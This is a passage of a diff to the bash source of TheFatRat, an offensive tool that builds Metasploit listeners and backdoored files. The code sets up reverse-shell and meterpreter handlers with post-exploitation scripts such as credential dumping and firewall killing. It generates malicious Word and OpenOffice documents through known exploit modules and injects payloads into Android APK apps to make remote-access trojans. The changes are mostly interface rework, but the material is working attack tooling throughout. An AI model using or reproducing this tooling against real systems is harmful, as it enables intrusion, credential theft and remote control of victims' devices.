"temp/meterpreter_linux.rc" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1655,7 +2500,7 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp clisteners fi @@ -1663,29 +2508,73 @@ fi echo set LPORT $yourport >> "temp/meterpreter_linux.rc" echo set ExitOnSession false >> "temp/meterpreter_linux.rc" echo exploit -j >> "temp/meterpreter_linux.rc" - zenity --question --text="Do you want to save this configuration to use in future ?" - if [ $? = 0 ] ; then - save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="linux-config"); - cp $path/temp/meterpreter_linux.rc $list/$save.rc >/dev/null 2>&1 + echo "" + echo -e $okegreen "Do you want to save this configuration to use in future ?" + echo "" + echo -ne "Choose y/n :" ;tput sgr0 + read svl + case $svl in + +y|Y|Yes|YES|yes) + echo "" + echo -e $okegreen "Write the name for this config. (ex: linux-config)" + echo "" + echo -ne $cyan "Filename : " ;tput sgr0 + read fln + +#empty input then save as default name +if [ -z $fln ] + then + cp $path/temp/meterpreter_linux.rc $list/linux-config.rc >/dev/null 2>&1 + echo "Empty input detected , configuration file as linux-config.rc " + echo "to: $list/linux-config.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select linux-config.rc" +echo "" echo -e $okegreen "" -echo "Configuration file saved to $list/$save.rc " -echo "" -echo -e $yellow "" -echo "To load this configuration press on this menu 5 and select $save.rc" -fi + echo -ne $okegreen"Press [ENTER] key to return to menu ." + read continue + clisteners + fi + +#input detected +cp $path/temp/meterpreter_linux.rc $list/$fln.rc >/dev/null 2>&1 + echo "Configuration file saved as $fln.rc " + echo "to: $list/$fln.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select $fln.rc" echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +n|no|No|NO) echo -e $okegreen "" -echo -ne $okegreen" Press any key to continue ......... " -read continue -clisteners - + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; + +*) +echo "" +echo -e $red "Invalid Input" +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +esac + elif test $fatrat1 == '2' #Windows then touch "temp/meterpreter_windows.rc" echo use exploit/multi/handler >> "temp/meterpreter_windows.rc" - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/powershell_bind_tcp" FALSE "windows/powershell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo set PAYLOAD $payload >> "temp/meterpreter_windows.rc" - pe=$(zenity --list --title "☣ TheFatRat ☣" --text "\npost-exploitation module to run" --radiolist --column "Pick" --column "Option" TRUE "sysinfo.rc" FALSE "fast_migrate.rc" FALSE "cred_dump.rc" FALSE "gather.rc" FALSE "auto_migrate+killfirewall.rc" --width 350 --height 240) > /dev/null 2>&1 + pldwin + echo set PAYLOAD $payload >> "temp/meterpreter_windows.rc" + postexp echo -e $okegreen"" echo -e $yellow " Your local IP address is : $lanip" echo -e $yellow " Your public IP address is : $publicip" @@ -1702,39 +2591,82 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp clisteners fi echo set LHOST $yourip >> "temp/meterpreter_windows.rc" echo set LPORT $yourport >> "temp/meterpreter_windows.rc" - echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc" + echo set AutoRunScript multi_console_command -rc $pe >> "temp/meterpreter_windows.rc" echo set ExitOnSession false >> "temp/meterpreter_windows.rc" echo exploit -j >> "temp/meterpreter_windows.rc" - zenity --question --text="Do you want to save this configuration to use in future ?" - if [ $? = 0 ] ; then - save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="windows-config"); - cp $path/temp/meterpreter_windows.rc $list/$save.rc >/dev/null 2>&1 - echo -e okegreen "" - echo "Configuration file saved to $list/$save.rc " echo "" -echo -e $yellow "" -echo "To load this configuration press on this menu 5 and select $save.rc" -fi +echo -e $okegreen "Do you want to save this configuration to use in future ?" + echo "" + echo -ne "Choose y/n :" ;tput sgr0 + read svl + case $svl in +y|Y|Yes|YES|yes) + echo "" + echo -e $okegreen "Write the name for this config. (ex: windows-config)" + echo "" + echo -ne $cyan "Filename : " ;tput sgr0 + read fln + +#empty input then save as default name +if [ -z $fln ] + then + cp $path/temp/meterpreter_windows.rc $list/windows-config.rc >/dev/null 2>&1 + echo "Empty input detected , configuration file as windows-config.rc " + echo "to: $list/windows-config.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select windows-config.rc" echo "" -echo -e $okegreen "" -echo -ne $okegreen" Press any key to continue ......... " -read continue -clisteners + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu ." + read continue + clisteners + fi - elif test $fatrat1 == '3' #Mac +#input detected +cp $path/temp/meterpreter_windows.rc $list/$fln.rc >/dev/null 2>&1 + echo "Configuration file saved as $fln.rc " + echo "to: $list/$fln.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select $fln.rc" +echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +n|no|No|NO) +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +*) +echo "" +echo -e $red "Invalid Input" +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +esac + + elif test $fatrat1 == '3' #Mac then rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_mac.rc" echo use exploit/multi/handler > "temp/meterpreter_mac.rc" echo set PAYLOAD osx/x86/shell_reverse_tcp >> "temp/meterpreter_mac.rc" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1749,7 +2681,7 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp clisteners fi @@ -1757,29 +2689,71 @@ fi echo set LPORT $yourport >> "temp/meterpreter_mac.rc" echo set ExitOnSession false >> "temp/meterpreter_mac.rc" echo exploit -j >> "temp/meterpreter_mac.rc" - zenity --question --text="Do you want to save this configuration to use in future ?" - if [ $? = 0 ] ; then - save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="mac-config"); - cp $path/temp/meterpreter_mac.rc $list/$save.rc >/dev/null 2>&1 - echo -e okegreen "" - echo "Configuration file saved to $list/$save.rc " echo "" -echo -e $yellow "" -echo "To load this configuration press on this menu 5 and select $save.rc" -fi +echo -e $okegreen "Do you want to save this configuration to use in future ?" + echo "" + echo -ne "Choose y/n :" ;tput sgr0 + read svl + case $svl in +y|Y|Yes|YES|yes) + echo "" + echo -e $okegreen "Write the name for this config. (ex: mac-config)" + echo "" + echo -ne $cyan "Filename : " ;tput sgr0 + read fln + +#empty input then save as default name +if [ -z $fln ] + then + cp $path/temp/meterpreter_mac.rc $list/mac-config.rc >/dev/null 2>&1 + echo "Empty input detected , configuration file as mac-config.rc " + echo "to: $list/mac-config.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select mac-config.rc" echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu ." + read continue + clisteners + fi + +#input detected +cp $path/temp/meterpreter_mac.rc $list/$fln.rc >/dev/null 2>&1 + echo "Configuration file saved as $fln.rc " + echo "to: $list/$fln.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select $fln.rc" +echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +n|no|No|NO) echo -e $okegreen "" -echo -ne $okegreen" Press any key to continue ......... " -read continue -clisteners + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +*) +echo "" +echo -e $red "Invalid Input" +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +esac elif test $fatrat1 == '4' #Android then rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_android.rc" echo use exploit/multi/handler > "temp/meterpreter_android.rc" - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - echo set PAYLOAD $payload >> "temp/meterpreter_android.rc" + pldand + echo set PAYLOAD $payload >> "temp/meterpreter_android.rc" echo -e $okegreen"" echo -e $yellow " Your local IP address is : $lanip" echo -e $yellow " Your public IP address is : $publicip" @@ -1796,7 +2770,7 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp clisteners fi @@ -1804,53 +2778,141 @@ fi echo set LPORT $yourport >> "temp/meterpreter_android.rc" echo set ExitOnSession false >> "temp/meterpreter_android.rc" echo exploit -j >> "temp/meterpreter_android.rc" - zenity --question --text="Do you want to save this configuration to use in future ?" - if [ $? = 0 ] ; then - save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="android-config"); - cp $path/temp/meterpreter_android.rc $list/$save.rc >/dev/null 2>&1 - echo -e okegreen "" - echo "Configuration file saved to $list/$save.rc " echo "" -echo -e $yellow "" -echo "To load this configuration press on this menu 5 and select $save.rc" -fi +echo -e $okegreen "Do you want to save this configuration to use in future ?" + echo "" + echo -ne "Choose y/n :" ;tput sgr0 + read svl + case $svl in +y|Y|Yes|YES|yes) + echo "" + echo -e $okegreen "Write the name for this config. (ex: android-config)" + echo "" + echo -ne $cyan "Filename : " ;tput sgr0 + read fln + +#empty input then save as default name +if [ -z $fln ] + then + cp $path/temp/meterpreter_android.rc $list/android-config.rc >/dev/null 2>&1 + echo "Empty input detected , configuration file as android-config.rc " + echo "to: $list/android-config.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select android.rc" echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu ." + read continue + clisteners + fi + +#input detected +cp $path/temp/meterpreter_android.rc $list/$fln.rc >/dev/null 2>&1 + echo "Configuration file saved as $fln.rc " + echo "to: $list/$fln.rc" + echo "" + echo -e $yellow "" + echo "To load this configuration press on this menu 5 and select $fln.rc" +echo "" + echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +n|no|No|NO) echo -e $okegreen "" -echo -ne $okegreen" Press any key to continue ......... " -read continue -clisteners + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +*) +echo "" +echo -e $red "Invalid Input" +echo -e $okegreen "" + echo -ne $okegreen"Press [ENTER] key to return to menu . " + read continue + clisteners +;; +esac + elif test $fatrat1 == '5' then - listener=$(zenity --file-selection --file-filter='RC files (rc) | *.rc' --title="Load your config file" --filename=$path/config/listeners/ ); - ret=$? - if [ $ret = "0" ]; then - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r $listener + echo "" + if [ -e $list/*.rc ] + then + echo -e $orange "+-------------------------+" + echo -e $orange "|$okegreen Current saved listeners$orange |" + echo -e $orange "+-------------------------+" + for liste in config/listeners/*.rc; do + echo ${liste##*/} + done + echo "" + echo -e $orange "+-------------------------+" + echo "" + echo -e $okegreen "Write the listener config file you want to load in msfconsole" + echo "" + echo -ne "Filename : ";tput sgr0 + read fname + if [ -z $fname ] + then + clear + clisteners + fi + if [ ! -f $list/$fname ] + then + echo "" + echo -e $red "The filename you wrote ($fname) do not exist in this list :" + echo "" + echo -e $orange "+-------------------------+" + echo -e $orange "|$okegreen Current saved listeners$orange |" + echo -e $orange "+-------------------------+" + echo -e $okegreen "" + for liste in config/listeners/*.rc; do + echo ${liste##*/} + done + echo "" + echo -e $yellow "Make sure you write the correct filename to load" + echo "" + echo -e $okegreen "Press [ENTER] key to return to menu" + read nfln + clear + clisteners + fi + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r $list/$fname clear menu - fi - if [ $ret = "1" ]; then + else + echo -e $yellow "No listeners configuration files were found." + echo "" + echo -e $okegreen "Press [ENTER] key to return to menu" + read nfln clear - fi - - elif test $fatrat1 == '6' + clisteners + fi + + elif test $fatrat1 == '6' then clear menu else echo -e " Incorrect Number" fi - echo -n -e " Do you want exit Fatrat ? ( Yes / No ) : " + echo -n -e " Do you want exit Fatrat ? ( y/n ) : " read back - if [ $back != 'n' ] && [ $back != 'N' ] - then - - clear - exit - elif [ $back != 'y' ] && [ $back != 'Y' ] - then - clisteners - fi + case $back in +y|Y|Yes|YES|yes) +clear +exit +;; +n|N|No|NO|no) +clisteners +;; +*) +clisteners +;; +esac } @@ -1896,7 +2958,8 @@ case $choice in 1) echo -e $red" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1918,12 +2981,12 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 + pldwin spinlong echo "" echo "" @@ -1933,7 +2996,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/windows/fileformat/ms12_027_mscomctl_bof" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.doc" >> $meterp @@ -1956,13 +3019,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.doc " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi ;; @@ -1970,7 +3033,8 @@ fi 2) echo -e $red"\n Worked on Microsoft Office on Windows " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -1993,7 +3057,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi @@ -2013,8 +3077,8 @@ fi then #payload n echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong + pldwin + spinlong echo "" echo "" gboor @@ -2023,7 +3087,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp @@ -2047,23 +3111,22 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi elif [ $exe != 'n' ] && [ $exe != 'N' ] then #payload y + selexe echo "" - exef=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your backdoor executable file"); - echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 + pldwin spinlong echo "" echo "" @@ -2073,7 +3136,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp @@ -2098,13 +3161,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi fi @@ -2113,7 +3176,8 @@ fi 3) echo -e $red" Worked on Libre Office on Mac ( Python ) " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2136,7 +3200,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi @@ -2158,8 +3222,7 @@ fi then #payload n - echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 350 --height 265) > /dev/null 2>&1 + pldmac spinlong echo "" echo "" @@ -2169,7 +3232,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp @@ -2194,23 +3257,21 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi elif [ $exe != 'n' ] && [ $exe != 'N' ] then #payload y - echo "" - exef=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your backdoor executable file"); + selexe fi - echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 350 --height 265) > /dev/null 2>&1 + pldmac spinlong echo "" echo "" @@ -2220,7 +3281,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp @@ -2245,13 +3306,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi ;; @@ -2260,7 +3321,8 @@ fi echo -e $red" Apache OpenOffice on Windows (PSH) " echo -e $okegreen"" echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2283,7 +3345,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi @@ -2298,8 +3360,8 @@ fi fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 - spinlong + pldwin + spinlong echo "" echo "" gboor @@ -2308,7 +3370,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/misc/openoffice_document_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.odt" >> $meterp @@ -2331,13 +3393,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.odt " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi ;; @@ -2345,7 +3407,8 @@ fi 5) echo -e $red" Apache OpenOffice on Linux (PSH) " echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2368,7 +3431,7 @@ invalid if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp microsploit fi @@ -2383,8 +3446,8 @@ fi fi echo "" - payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 - spinlong + pldmul + spinlong echo "" echo "" gboor @@ -2393,7 +3456,7 @@ fi rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/misc/openoffice_document_macro" >$meterp - echo "set PAYLOAD $payloads" >> $meterp + echo "set PAYLOAD $payload" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.odt" >> $meterp @@ -2416,13 +3479,13 @@ fi then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.odt " echo -e - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" - read -rsp $'Press any key to return to menu\n' -n 1 key + read -rsp $'Press [ENTER] key to return to menu\n' -n 1 key microsploit fi ;; @@ -2459,7 +3522,8 @@ rm -rf temp/* sleep 2 echo "Done!" echo -e $okegreen"" -echo -e $yellow " Your local IP address is : $lanip" +echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" echo -e $yellow " Your public IP address is : $publicip" echo -e $yellow " Your Hostname is : $hostn" if [ ! -f "$defcon" ] @@ -2479,32 +3543,38 @@ invalid1 if [ $err == "1" ] then echo -e $okegreen "" -echo -n "Press any key to return to menu ." +echo -n "Press [ENTER] key to return to menu ." read inp embedapk fi echo "" -copyfile=$(zenity --file-selection --file-filter='APK files (apk) | *.apk' --title="Select your app/game apk file"); -cp $copyfile $path/temp/app.apk >/dev/null 2>&1 +selapk +cp $exef $path/temp/app.apk >/dev/null 2>&1 apkt="$path/temp/app.apk" if [ ! -f $apkt ]; then - zenity --no-wrap --error --text="`printf "There was a problem copying your APK file \n to a temporary location \n try with other apk ."`" - read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key + echo "" +echo -e $red "There was a problem copying your apk file to final destination ." + read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key menu fi echo "" -payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 +pldand echo "" echo "" spinlong echo "" sleep 1 -method=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Use Backdoor-apk 0.2.2" FALSE "Use old Fatrat method" --text="Select tool to create apk :"); -case $method in - -"Use Backdoor-apk 0.2.2") +echo -e $orange "+------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Use Backdoor-apk 0.2.2$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Use old Fatrat method$orange |" +echo -e $orange "+------------------------------+" +echo "" +echo -ne $cyan "Select Tool to create apk : ";tput sgr0 +read apkto +case $apkto in +1) echo "" spinlong outf="app_backdoor.apk" @@ -2519,12 +3589,12 @@ echo $yourport >> $apkconfig ./backdoor_apk echo "" sleep 2 - read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key + read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key clear menu ;; -"Use old Fatrat method") +2) echo -e $okegreen "" spinlong @@ -2550,7 +3620,7 @@ echo -e $red "" echo "[x] There was an error in the creation of the payload . Check log file at : $log" rm -rf temp/* > /dev/null 2>&1 -read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key clear menu fi @@ -2599,7 +3669,7 @@ echo "[x] There was an error in the creation of your RAT APK file , the possible - It was not possible to inject the payload in the hook you selected (in this case select a different hook point) Check log file at : $log" echo -e $okegreen "" -read -rsp $'Press any key to return to fatrat menu\n' -n 1 key +read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key menu fi @@ -2636,7 +3706,7 @@ echo "[x] There was an error copying your Rat app to final destination . Check log file at : $log" rm -rf temp/* > /dev/null 2>&1 echo -e $okegreen "" - read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key + read -rsp $'Press [ENTER] key to continue to return to fatrat menu\n' -n 1 key menu fi @@ -2649,27 +3719,8 @@ echo "[*] Removing temporary files" sleep 2 rm 